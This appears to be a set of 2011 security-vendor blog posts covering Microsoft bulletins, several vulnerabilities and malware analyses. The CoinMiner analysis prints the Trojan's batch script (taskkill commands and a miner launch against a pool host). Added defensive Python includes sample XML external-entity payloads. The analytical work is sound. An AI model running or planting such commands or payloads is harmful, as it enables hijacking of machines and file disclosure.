
Microsoft Security Bulletin Coverage (Oct 11, 2011)

SonicWALL has analyzed and addressed Microsoft’s security advisories for the month of October, 2011. A list of issues reported, along with SonicWALL coverage information follows:

MS11-075 Vulnerability in Microsoft Active Accessibility Could Allow Remote Code Execution (2623699)

  • CVE-2011-1247 Active Accessibility Insecure Library Loading Vulnerability
    IPS: 5726 – Possible Binary Planting Attempt

MS11-076 Vulnerability in Windows Media Center Could Allow Remote Code Execution (2604926)

  • CVE-2011-2009 Media Center Insecure Library Loading Vulnerability
    IPS: 5726 – Possible Binary Planting Attempt

MS11-077 Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (2567053)

  • CVE-2011-1985 Win32k Null Pointer De-reference Vulnerability
    This is a local vulnerability.
  • CVE-2011-2002 Win32k TrueType Font Type Translation Vulnerability
    There is no feasible method of detection.
  • CVE-2011-2003 Font Library File Buffer Overrun Vulnerability
    IPS: 2252 – Malformed OpenType Font 10b
  • CVE-2011-2011 Win32k Use After Free Vulnerability
    There is no feasible method of detection.

MS11-078 Vulnerability in .NET Framework and Microsoft Silverlight Could Allow Remote Code Execution (2604930)

  • CVE-2011-1253 Class Inheritance Vulnerability
    GAV: MsApp.Exp.MP.1

MS11-079 Vulnerabilities in Microsoft Forefront Unified Access Gateway Could Cause Remote Code Execution (2544641)

  • CVE-2011-1895 ExcelTable Response Splitting XSS Vulnerability
    IPS: 2418 – ExcelTable Code Injection 1
  • CVE-2011-1896 ExcelTable Reflected XSS Vulnerability
    IPS: 2419 – ExcelTable Code Injection 2
  • CVE-2011-1897 Default Reflected XSS Vulnerability
    IPS: 2300 – Generic Cross-Site Scripting (XSS) Attempt 24
  • CVE-2011-1969 Poisoned Cup of Code Execution Vulnerability
    IPS: 2420 – Generic Java Applet Exploit 3
  • CVE-2011-2012 Null Session Cookie Crash
    IPS: 2258 – Suspicious HTTP Cookie Header 3

MS11-080 Vulnerability in Ancillary Function Driver Could Allow Elevation of Privilege (2592799)

  • CVE-2011-2005 Ancillary Function Driver Elevation of Privilege Vulnerability
    This is a local vulnerability.

MS11-081 Cumulative Security Update for Internet Explorer (2586448)

  • CVE-2011-1993 Scroll Event Remote Code Execution Vulnerability
    IPS: 7029 – MS IE Scroll Event Remote Code Execution Exploit
  • CVE-2011-1995 OLEAuto32.dll Remote Code Execution Vulnerability
    IPS: 7028 – MS IE OLEAuto32.dll Remote Code Execution Exploit
  • CVE-2011-1996 Option Element Remote Code Execution Vulnerability
    IPS: 7027 – MS IE Option Element Remote Code Execution Exploit
  • CVE-2011-1997 OnLoad Event Remote Code Execution Vulnerability
    IPS: 7026 – MS IE OnLoad Event Remote Code Execution Exploit
  • CVE-2011-1998 Jscript9.dll Remote Code Execution Vulnerability
    IPS: 7025 – MS IE Jscript9.dll Remote Code Execution Exploit
  • CVE-2011-1999 Select Element Remote Code Execution Vulnerability
    IPS: 7024 – MS IE Select Element Remote Code Execution Exploit
  • CVE-2011-2000 Body Element Remote Code Execution Vulnerability
    IPS: 7022 – MS IE Body Element Remote Code Execution Exploit
  • CVE-2011-2001 Virtual Function Table Corruption Remote Code Execution Vulnerability
    IPS: 7021 – MS IE Virtual Function Table Corruption Exploit

MS11-082 Vulnerabilities in Host Integration Server Could Allow Denial of Service (2607670)

  • CVE-2011-2007 Endless Loop DoS in snabase.exe Vulnerability
    IPS: 5012 – Generic UDP Shellcode Exploit 2
  • CVE-2011-2008 Access of Unallocated Memory DoS Vulnerability
    IPS: 4896 – Generic Server Application Shellcode Exploit 9
    IPS: 5512 – Generic Server Application Shellcode Exploit 28
    IPS: 6701 – MS Host Integration Server DoS

Novell GroupWise vCalendar Processing Vulnerability (Oct 7, 2011)

Novell GroupWise is a messaging and collaborative software platform that supports email, calendaring, personal information management, instant messaging, and document management. The platform consists of the client software, which is available for Windows, Mac OS X, and Linux, and the server software, which is supported on Windows Server, NetWare, and Linux. Novell GroupWise Internet Agent is a component of Novell GroupWise and provides email services, supporting SMTP, POP, and IMAP protocols.

vCalendar is a computer file format which allows Internet users to send meeting requests and tasks to other Internet users, via email, or by sharing files with an extension of .vcs. Events which occur on a regular basis can be identified by the property name RRULE. This property defines a rule or repeating pattern for a recurring vCalendar entity.

A heap-based buffer overflow vulnerability exists in Novell GroupWise Internet Agent. Specifically, the vulnerability occurs while processing RRULE data inside a vCalendar object. An attacker can exploit this vulnerability by sending a crafted vCalendar to the Novell GroupWise server. Successful exploitation would allow for arbitrary code injection and execution with the privileges of the Internet Agent service. Code injection that does not result in execution would terminate the service.

The vulnerability has been assigned as CVE-2011-2662.

SonicWALL has released an IPS signature to detect and block specific exploitation attempts targeting this vulnerability. The signature is listed below:

  • 6033 Novell GroupWise Internet Agent RRULE Buffer Overflow

New GPU Bitcoin Miner Trojan spotted in the wild (Oct 6, 2011)

The SonicWALL UTM research team received reports of a new Bitcoin Trojan in the wild. Bitcoin is a decentralized p2p crypto-currency. The process of generating (mining) bitcoins is computationally expensive, and it would take an impractical amount of time to generate a single bitcoin on a personal computer. If, however, an attacker were able to compromise a handful of machines with fast parallel Graphics Processing Units, it could turn into a very lucrative money-making business. CoinMiner.A is a Trojan that attempts to fulfill this purpose.

The Trojan uses the following icon:

The Trojan adds the following files to the filesystem:

  • C:\Documents and Settings\{USER}\Local Settings\Temp\acc\3kal.cmd
  • C:\Documents and Settings\{USER}\Local Settings\Temp\acc\hsbca.exe
  • C:\Documents and Settings\{USER}\Local Settings\Temp\acc\mamatije5.exe [Detected as GAV: CoinMiner.A_2 (Trojan)]
  • C:\Documents and Settings\{USER}\Start Menu\Programs\Startup\wuT2.exe [Detected as GAV: CoinMiner.A_3 (Trojan)]

hsbca.exe is non-malicious software from NTWind called Hidden Start. It is used to run batch files and other programs without a console window. It uses the following icon:

wuT2.exe uses the following icon:

3kal.cmd contains the following data:

      ping -n 40 google.com
      taskkill /f /im cgminer.exe
      taskkill /f /im svchoost.exe
      taskkill /f /im mamatije.exe
      taskkill /f /im mamatije2.exe
      taskkill /f /im mamatije3.exe
      taskkill /f /im yaaa3.2.exe
      taskkill /f /im WinMine.exe
      taskkill /f /im mamatije4.exe
      mamatije5.exe -a 59 -g no -o http://y.b{removed}.info:8332/ -u dxstr_miner -p hello -t 2

The Trojan adds the following keys to the Windows registry:

  • HKEY_CURRENT_USER\Software\WinRAR SFX C:\Documents and Settings\{USER}\Start Menu\Programs\Startup "C:\Documents and Settings\{USER}\Start Menu\Programs\Startup"
  • HKEY_CURRENT_USER\Software\WinRAR SFX C:\Documents and Settings\{USER}\Local Settings\Temp\acc "C:\Documents and Settings\{USER}\Local Settings\Temp\acc"

The Trojan attempts to open the following files:

  • C:\Documents and Settings\{USER}\Start Menu\Programs\Startup\start.exe
  • C:\Documents and Settings\{USER}\Start Menu\Programs\Startup\hahahahaha.exe
  • C:\Documents and Settings\{USER}\Start Menu\Programs\Startup\wuT.exe
  • C:\Documents and Settings\{USER}\Start Menu\Programs\Startup\NoRisk.exe
  • C:\Documents and Settings\{USER}\Start Menu\Programs\Startup\NoRisk2.exe

The Trojan uses hsbca.exe (Hidden Start) to run “3kal.cmd” via the following command:

      C:\Documents and Settings\{USER}\Local Settings\Temp\acc\hsbca.exe "/NOCONSOLE C:\Documents and Settings\{USER}\Local Settings\Temp\acc\3kal.cmd"

The Trojan runs the following command to ensure internet connectivity:

  • ping -n 40 google.com

As defined in “3kal.cmd” the Trojan runs taskkill.exe in an attempt to kill the following programs if they are loaded:

  • cgminer.exe
  • svchoost.exe
  • mamatije.exe
  • mamatije2.exe
  • mamatije3.exe
  • yaaa3.2.exe
  • WinMine.exe
  • mamatije4.exe

Our analysis determined that the Trojan uses Nvidia CUDA to employ the GPU (if present) to generate bitcoins:

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: CoinMiner.A (Trojan)
  • GAV: CoinMiner.A_2 (Trojan)
  • GAV: CoinMiner.A_3 (Trojan)

Apache HTTPD mod_proxy_ajp DoS (Sep 30, 2011)

The Apache HTTP server is the most popular web server used on the Internet. The server comes bundled with optional plug-in modules which are loaded at run-time to extend its functionality. Two technologies supported by the Apache HTTP server are the Apache JServ Protocol (AJP) and httpd based load balancing.

AJP is a binary protocol which routes requests from a web server to application servers. This is done by using a routing scheme where each application server is given a name, known as its ‘route’. This setup is usually used in high demand environments where clusters of servers are implemented. It is implemented through the module mod_proxy_ajp. Although load balancing can be performed with this protocol, the module mod_cluster can be used in addition to mod_proxy_ajp to provide additional load balancing capabilities. While mod_proxy_ajp creates channels between the web servers and the application servers, mod_cluster creates channels between the application servers and the web server to provide more detailed information about the server state. This allows the proxy to dynamically configure httpd workers based on the application server environment.

Typically, an HTTP request is received by the web server, which then forwards it to the appropriate backend server based on the load balancer's information. HTTP requests include a request line and various headers. The Request-Line begins with a method token, followed by the Request-URI, the protocol version, and CRLF. An example of an HTTP request line follows:

      GET /test.html HTTP/1.1
      Host: www.test.com

A denial of service vulnerability exists in the mod_proxy_ajp module. The vulnerability is due to insufficient validation of HTTP requests. The vulnerable code does not properly handle some HTTP methods. When a malicious request is processed by the code, it returns an HTTP_INTERNAL_SERVER_ERROR which puts the proxy workers into an error state. At this point, the workers are unable to accept any connections, resulting in a denial of service condition. An unauthenticated, remote attacker can exploit this vulnerability by sending an HTTP request with an invalid method. Exploitation of this flaw results in a temporary denial of service condition.
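As an added example (not code from the article or from the Apache project), the following Python models the edge check a front-end filter or IPS signature performs before a request reaches an AJP worker: it refuses request lines whose method is not a valid RFC 2616 token, or is outside an assumed allow-list of methods worth forwarding, so an unknown method never gets a chance to push the worker into its error state.

```python
import re

# RFC 2616 "token": one or more characters that are neither CTLs nor separators.
TOKEN_RE = re.compile(r"^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$")
VERSION_RE = re.compile(r"^HTTP/\d\.\d$")

# Methods the front-end is willing to hand to the AJP backend. This allow-list is
# an assumed policy for the example, not an Apache or mod_proxy_ajp default.
ALLOWED_METHODS = frozenset({"GET", "HEAD", "POST", "PUT", "DELETE", "OPTIONS"})


def parse_request_line(line):
    """Split 'Method SP Request-URI SP HTTP-Version CRLF' into its three fields.

    Returns (method, uri, version), or None when the line does not have exactly
    three space-separated fields or the version is not of the form HTTP/x.y.
    """
    fields = line.rstrip("\r\n").split(" ")
    if len(fields) != 3:
        return None
    method, uri, version = fields
    if not VERSION_RE.match(version):
        return None
    return method, uri, version


def classify_request_line(line):
    """Decide what an edge filter should do with one request line.

    'forward'            well-formed, method on the allow-list
    'malformed'          not a valid Request-Line at all
    'bad-method-token'   method field contains characters a token may not
    'method-not-allowed' syntactically valid token, but not a method we forward
    """
    parsed = parse_request_line(line)
    if parsed is None:
        return "malformed"
    method = parsed[0]
    if not TOKEN_RE.match(method):
        return "bad-method-token"
    if method not in ALLOWED_METHODS:
        return "method-not-allowed"
    return "forward"


def triage_request_lines(lines):
    """Map each request line (CRLF stripped) to its classification."""
    return {line.rstrip("\r\n"): classify_request_line(line) for line in lines}


# Constructed sample request lines; the first is the article's own example.
SAMPLE_REQUEST_LINES = [
    "GET /test.html HTTP/1.1\r\n",
    "POST /app/login HTTP/1.1\r\n",
    "FOOBAR /test.html HTTP/1.1\r\n",   # valid token, but not a method we forward
    "G\x7fT /test.html HTTP/1.1\r\n",   # control character inside the method
    "GE T /test.html HTTP/1.1\r\n",     # too many fields
    "GET /test.html HTTP/11\r\n",       # bad version field
]

if __name__ == "__main__":
    for request_line, verdict in triage_request_lines(SAMPLE_REQUEST_LINES).items():
        print(f"{verdict:18} {request_line!r}")
```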

SonicWALL has released two IPS signatures to address this issue. The following signatures have been released:

  • 2063 – Apache mod_proxy_ajp DoS 2
  • 2065 – Apache mod_proxy_ajp DoS 2

This vulnerability has been assigned the id CVE-2011-3348 by MITRE.
The vendor has released an advisory addressing this flaw.

Mac OS X Flashback Backdoor Trojan (Sep 29, 2011)

The SonicWALL UTM Research team received reports of a new Mac OS X Flashback Trojan spreading in the wild by masquerading as an Adobe Flash Player 11 installer. Once installed, it proceeds to install a backdoor on the system, contacts a remote server to report the infection and awaits further instructions.

The fake installer is automatically executed when downloaded through Safari. The user is then led through the following installation screens:

screenshot

screenshot

It performs the following activities when installed:

  • It drops the following files:
    • ~/Library/Preferences/Preferences.dylib
    • ~/.MacOSX/environment.plist
    • /tmp/AdobeUpdate/FlashPlayer.txt
  • The preinstall script removes the downloaded “FlashPlayer-11-macos.pkg” file once installation is completed.
  • It checks for presence of “Little Snitch” security software by querying for “/Library/Little Snitch/lsd” and disables it.
  • It modifies the “DYLD_INSERT_LIBRARIES” environment variable for “launchd” to point to “~/Library/Preferences/Preferences.dylib”. This ensures malicious Preferences.dylib is loaded when certain applications/daemons are launched.
  • It reports infection to remote server.
      screenshot
  • The user agent used when reporting to the remote server is a combination of the kernel variables “hw.machine” and “kern.osrelease” read from the infected system.

We advise users to only download software from trusted sources. We also recommend disabling the “Open safe files after downloading” feature in Safari, which will prevent this Trojan installer from automatically launching on download. This feature can be unchecked in Safari->Preferences->General:

screenshot

SonicWALL Gateway AntiVirus provides protection against this threat with the following signature:

  • GAV: OSX.Flashback.A (Trojan)

Microsoft SharePoint XML File Disclosure (Sept 23, 2011)

Microsoft SharePoint Server is an ASP.NET product intended for collaboration, file sharing, web publishing and other social networking functions. The server runs on the Microsoft IIS web server. SharePoint farms host web sites, intranets and extranets, as well as providing a framework for web application development. SharePoint also allows the creation of ASP.NET controls known as Web Parts or Web Widgets to enhance the functionality of a particular SharePoint page. These controls allow end users to modify various aspects of the web page from their web browser. One of the widgets included in the SharePoint package is the XML Viewer. The XML Viewer has the ability to display XML documents and apply XSLT to them. An example of content that can be added to an XML Viewer widget on a SharePoint page is shown:


XML defines entities, which are symbolic representations of a block of information. Entities can be either external or internal. Internal entities are defined and used inside the XML file. External entities exist in an external source, such as a file, and require the SYSTEM identifier in order to be imported and used. An example of an external entity definition is shown:

In the above example, the external resource identifier is a URI. Most of the time, it's a simple file name.

An information disclosure vulnerability exists in Microsoft SharePoint. It is due to an error while parsing XML files which use external entities. The vulnerable code allows a user to specify an arbitrary file and path as the external resource. This can allow a user to create an XML Viewer Web Part which discloses the contents of arbitrary files within the SharePoint server scope. In order to exploit this flaw, an attacker must first be successfully authenticated by the target SharePoint server.
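As an added example (not code from the article or from Microsoft), the following Python shows the two defensive checks that matter for this class of flaw: a scanner that lists the external entities a document's DTD declares, which is the pattern a signature looks for, and a hardened parse that refuses viewer content carrying any DOCTYPE at all. The sample documents, and the file path and host inside them, are constructed for the example.

```python
import re
import xml.etree.ElementTree as ET

# <!ENTITY name SYSTEM "uri"> or <!ENTITY name PUBLIC "pubid" "uri">, optionally a
# parameter entity (<!ENTITY % name ...>). Only external entities match: an internal
# entity has a quoted replacement text where SYSTEM/PUBLIC would be.
EXTERNAL_ENTITY_RE = re.compile(
    r"<!ENTITY\s+(?:%\s+)?(?P<name>[^\s>]+)\s+"
    r"(?:SYSTEM\s+|PUBLIC\s+(?:\"[^\"]*\"|'[^']*')\s+)"
    r"(?:\"(?P<dq>[^\"]*)\"|'(?P<sq>[^']*)')",
    re.IGNORECASE,
)
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)


def external_entities(xml_text):
    """Return [(entity_name, uri)] for every external entity declared in the DTD."""
    found = []
    for m in EXTERNAL_ENTITY_RE.finditer(xml_text):
        uri = m.group("dq") if m.group("dq") is not None else m.group("sq")
        found.append((m.group("name"), uri))
    return found


def triage_xml(xml_text):
    """'external-entity' if the DTD pulls in outside resources, 'doctype' if it
    merely carries a DTD, 'clean' otherwise."""
    if external_entities(xml_text):
        return "external-entity"
    if DOCTYPE_RE.search(xml_text):
        return "doctype"
    return "clean"


def safe_parse(xml_text):
    """Parse XML for display, refusing any document that carries a DOCTYPE.

    With no DTD there is nowhere to declare an external entity, so the parser never
    has a reason to open a file or URL on the server's behalf. Raises ValueError.
    """
    if DOCTYPE_RE.search(xml_text):
        raise ValueError("DOCTYPE declarations are not permitted in viewer content")
    return ET.fromstring(xml_text)


def is_rejected(xml_text):
    """True when safe_parse() refuses the document."""
    try:
        safe_parse(xml_text)
    except ValueError:
        return True
    return False


# Constructed sample documents (not taken from any real SharePoint site).
DOC_CLEAN = '<?xml version="1.0"?><root><item>test</item></root>'
DOC_INTERNAL = '<!DOCTYPE root [ <!ENTITY greet "hello"> ]><root>&greet;</root>'
DOC_EXTERNAL = (
    '<?xml version="1.0"?>\n'
    '<!DOCTYPE root [\n'
    '  <!ENTITY ext SYSTEM "file:///constructed/path/example.txt">\n'
    ']>\n'
    '<root>&ext;</root>'
)
DOC_PARAM = (
    "<!DOCTYPE root [ <!ENTITY % dtd SYSTEM 'http://example.invalid/x.dtd'> %dtd; ]>"
    "<root/>"
)
```

`triage_xml` is what an inspection point would run on submitted viewer content; `safe_parse` is what the rendering side should do regardless of that verdict.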

SonicWALL has released two IPS signatures to address this vulnerability. The signatures detect and block generic attack attempts targeting this flaw.

  • 1856 – SharePoint Remote File Disclosure 1
  • 1003 – SharePoint Remote File Disclosure 2

The vulnerability has been assigned CVE-2011-1892 by MITRE.
The vendor has released an advisory (ms11-074) addressing this issue.

Fake AV spreading via Skype VOIP calls (Sep 20, 2011)

The SonicWALL UTM research team received reports of an increase in the number of unsolicited Skype calls trying to spread Fake AV.

Fake AV authors are using Skype VOIP calls to lure unsuspecting users into visiting a Fake AV landing site. We first received reports of this tactic earlier this year, in April 2011, and there has been a rise in these automated calls with prerecorded messages since then. Below is a screenshot of the most recent call received by one of our researchers:

There is a pre-recorded message that loops multiple times before the call ends:

      Attention: This is an automated computer system alert.
      Your computer protection service is not active.
      To activate computer protection, and repair your computer, go to www.sos(REMOVED).com

If the user opens the website, he will see the usual Fake AV scare-ware animations claiming to scan the computer and find multiple threats:

It finally prompts the user to buy the protection service to fix the errors:

They are using Click2Sell.eu, a European affiliate marketing company, as the payment gateway. This is an interesting new scare-ware tactic, in which the Fake AV authors are:

  • Using Skype VOIP calls to spread.
  • Luring users straight to the payment gateway for computer protection without downloading any scare-ware onto the user's system, hence bypassing AV file detection.
  • Making the user sign up for a monthly subscription of 19.95 USD instead of the traditional one-time payment for the Fake AV.

In order to avoid such scam tactics, Skype users are advised to change their privacy settings for calls to only allow calls from their contacts:

Additionally, SonicWALL customers can utilize the Application Control service to prevent this threat by blocking Skype calls on their network.

SpyEye targets Android devices with Spitmo.A (Sep 13, 2011)

The SonicWALL UTM Research team received reports of a new SpyEye banking Trojan variant targeting the Android platform. This variant uses MitB (Man-in-the-Browser) techniques when the user visits banking websites in order to direct the user to download an Android application. The Android application purports to generate the authentication code required to log in to the banking website, but once installed, it intercepts the user's messages and uploads them to a remote server in the background.

When the rogue application is downloaded and the installer is launched, it requests the following permissions:

screenshot

It performs the following activities when installed:

  • Once installed, it does not show up in the device's list of installed applications but runs silently in the background as “System”:
    screenshot
  • It displays a fake authentication code for logging in to the banking website when a call is placed to “325000”:
    screenshot
  • It displays the fake code on the home screen as seen below:
    screenshot
  • It contacts the following domains, which are no longer active:
    screenshot
  • The remote URLs are hidden in the “Settings.xml” file of the Android application:
    screenshot
  • It intercepts messages and constructs data to be sent to a remote server:
    screenshot

    screenshot
  • It uploads intercepted messages to a remote server:
    screenshot

SonicWALL Gateway AntiVirus provides protection against this threat with the following signature:

  • GAV: AndroidOS.Spitmo.A (Trojan)
Microsoft Security Bulletins Coverage (Sept 13, 2011)

SonicWALL has analyzed and addressed Microsoft’s security advisories for the month of September, 2011. A list of issues reported, along with SonicWALL coverage information follows:

MS11-070 Vulnerability in WINS Could Allow Elevation of Privilege (2571621)

  • CVE-2011-1984 WINS Local Elevation of Privilege Vulnerability
    Local vulnerability.

MS11-071 Vulnerability in Windows Components Could Allow Remote Code Execution (2570947)

  • CVE-2011-1991 Windows Components Insecure Library Loading Vulnerability
    IPS: 5726 – Possible Binary Planting Attempt

MS11-072 Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (2587505)

  • CVE-2011-1986 Excel Use after Free WriteAV Vulnerability
    GAV: Malformed.xls.MP.2
  • CVE-2011-1987 Excel Out of Bounds Array Indexing Vulnerability
    GAV: Malformed.xls.MP.3
  • CVE-2011-1988 Excel Heap Corruption Vulnerability
    GAV: Malformed.xls.MP.4, Malformed.xls.MP.5, Malformed.xls.MP.6
  • CVE-2011-1989 Excel Conditional Expression Parsing Vulnerability
    GAV: Malformed.xls.MP.7
  • CVE-2011-1990 Excel Out of Bounds Array Indexing Vulnerability
    GAV: Malformed.xls.MP.8

MS11-073 Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (2587634)

  • CVE-2011-1980 Office Component Insecure Library Loading Vulnerability
    IPS: 5726 – Possible Binary Planting Attempt
  • CVE-2011-1982 Office Uninitialized Object Pointer Vulnerability
    GAV: Malformed.doc.MP.3

MS11-074 Vulnerabilities in Microsoft SharePoint Could Allow Elevation of Privilege (2451858)

  • CVE-2011-0653 XSS in SharePoint Calendar Vulnerability
    IPS: 6753 – Generic Cross-Site Scripting (XSS) Attempt 8
  • CVE-2011-1252 HTML Sanitization Vulnerability
    IPS: 6797 – MS IE toStaticHTML XSS 3
  • CVE-2011-1890 Editform Script Injection Vulnerability
    IPS: 1868 – Generic Cross-Site Scripting (XSS) Attempt 21
  • CVE-2011-1891 Contact Details Reflected XSS Vulnerability
    IPS: 1849 – Generic Cross-Site Scripting (XSS) Attempt 20
  • CVE-2011-1892 SharePoint Remote File Disclosure Vulnerability
    IPS: 1856 – SharePoint Remote File Disclosure
  • CVE-2011-1893 SharePoint XSS Vulnerability
    IPS: 1369 – Generic Cross-Site Scripting (XSS) Attempt 1, 6752 – Generic Cross-Site Scripting (XSS) Attempt 7

New Screen Lock Ransomware poses as Microsoft License Manager (Sept 9, 2011)

The SonicWALL UTM research team received reports of a new ransom malware in the wild. Malware of this nature holds a compromised machine hostage until payment is made. This software pretends to come from Microsoft and claims that the license used on the compromised system is not authentic. As a result, the user is encouraged to buy a “license” from the creators of the Trojan. The user is forced to do this from another machine, as the desktop is locked.

Upon execution, the Trojan will immediately reboot the system. On reboot, the following screen will be displayed:

There is no conventional way of exiting the screen other than to follow the malicious instructions for obtaining a license from www.buylicens.com for 50 Euros.

The following screenshot is from www.buylicens.com and has been partially translated from German to English:

The Trojan performs the following DNS query:

  • lic{removed}.cz.cc (This site is currently down)

The Trojan creates the following files on the filesystem:

  • C:\Documents and Settings\{USER}\Start Menu\Programs\Startup\msvcs.exe [Detected as GAV: Ransom.A_2 (Trojan)]
    (This is a copy of the original executable that was run)

The Trojan creates the following keys in the Windows registry:

  Enable startup:

  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "C:\Documents and Settings\{USER}\Application Data\9A52917-B4FC-4f02-AE3B-BF55D9351F4A\msvcs.exe"
  • HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\WinLogon "C:\WINDOWS\system32\userinit.exe,C:\Documents and Settings\{USER}\Application Data\9A52917-B4FC-4f02-AE3B-BF55D9351F4A\msvcs.exe"

The Trojan injects code into a Firefox browser process. If Firefox is not present on the system, it falls back to using Internet Explorer. It causes the following network conversation with a remote host:

During analysis it was discovered that the Trojan executable file contains the unlock key (QRT5T 5FJQE 53BGX T9HHJ W53YT) in plain text. This key appears to remove the Trojan:

SonicWALL Gateway AntiVirus provides protection against this threat via the following signature:

  • GAV: Ransom.A_2 (Trojan)